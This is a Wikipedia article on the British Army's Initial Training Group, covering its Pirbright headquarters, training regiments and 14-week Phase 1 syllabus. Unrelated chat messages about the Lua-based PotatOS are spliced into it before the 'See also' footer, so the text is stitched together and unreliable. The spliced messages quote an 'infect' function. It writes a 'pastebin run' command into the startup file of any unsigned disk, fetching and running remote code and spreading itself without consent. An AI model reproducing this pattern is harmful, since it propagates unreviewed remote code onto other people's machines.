Initial Training Group

The Initial Training Group of the British Army is responsible for the content and delivery of non-infantry Phase 1 training. The group's headquarters are at Pirbright, Surrey, commanding 3 Army Training Regiments, 5 Army Training Units, the Army Training Regiment, Grantham as well as the Army Foundation College in Harrogate, the Army School of Physical Training and the ARITC Staff Leadership School. It is part of the Army Recruiting and Training Command, who are responsible for all recruiting and training prior to becoming a fully qualified soldier or officer.

Initial Training Group (ITG)
Country United Kingdom
Branch British Army
Part ofBritish Armed Forces
HQArmy Recruiting and Training Division (ARTD)
Motto(s)Trust, Courage, Team Spirit

The headquarters is commanded by a Brigadier, supported by a number of military and civilian staff.

Vision

ITG states its vision as:

Initial Training Group delivers trained and motivated Regualar and Reserve Soldiers to Initial Trade Training. Training is delivered through inspirational Junior Commanders, who transform our Recruits from civilians to trained soldiers; ready to take on the challenges of service life.

Units

ITG is responsible for the Army Training Regiments (ATRs), which provide Phase 1 Training for the majority of the regiments and corps in the British Army.


Training

Initial Training Group delivers Phase 1 training for Regular Soldier entry, known as the Common Military Syllabus, over a 14 week training course in the Army Training Centre Pirbright and Army Training Regiment Winchester. The Army Foundation College, Harrogate is the only Junior Entry Phase 1 training establishment in the British Army and trains recruits ages 16 - 17 1/2 years old. It offers a mix of military training, personal development and education.

Reserve training is delivered at the Regional Army Training Units, the Army Training Regiment, Grantham and at the Army Training Centre Pirbright. All Reserve training locations teach everything an Army Reserve recruits needs to know to become and effective soldier and fulfil their role in the Army Reserve.

All courses are designed to develop the individual and team skills in a progressive manner, preparing recruits for their Initial Trade Training, where they learn the specific skills for their chosen Army trade.

gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.

See also

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.